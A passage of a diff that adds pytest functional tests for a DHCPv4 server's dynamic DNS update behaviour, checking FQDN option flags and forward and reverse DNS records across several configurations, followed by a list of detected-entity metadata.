srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + 
srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + # Client 2 add + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'client2.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + # Client 2 tries to update client 1's domain + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12') + srv_msg.client_copy_option('server_id')
+ srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.') + srv_msg.client_sets_value('Client', 'FQDN_flags', 'S') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 1) + srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.') + + # address and domain name should not be changed! + misc.test_procedure() + srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.forward_reverse_add +def test_ddns4_notsig_forw_and_rev_add_success_withoutflag_override_client(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('override-client-update', True) + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + 
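+ # The FQDN below carries no flags; with override-client-update the server performs the forward update itself, which is why flags 3 (S and O) are expected in the ACK.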
srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 3) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.reverse_add +def test_ddns4_notsig_rev_success_withoutflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + 
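+ # With no client flags and no override option, the server is expected to do only the reverse (PTR) update: flags 0 below, an answered PTR query, and no A record.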
srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 0) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.reverse_add +def test_ddns4_notsig_rev_withoutflag_notenabled(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', False) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + # Response option 81 MUST contain flags 0. 
# TODO: verify the 'S', 'N' and 'O' bits individually once the server sets them; the flags value should then be 10 + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.reverse_add +def test_ddns4_notsig_rev_Nflag_override_no_update(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('override-no-update', True) + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_flags', 'N') + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 3) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com.', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 
'rrname', 'aa.four.example.com.') +",40763,"[['DATE_TIME', 'test_ddns4_notsig_forw_and_rev_notenabled_Sflag'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', 
'127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.exae.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.exae.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 
'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], 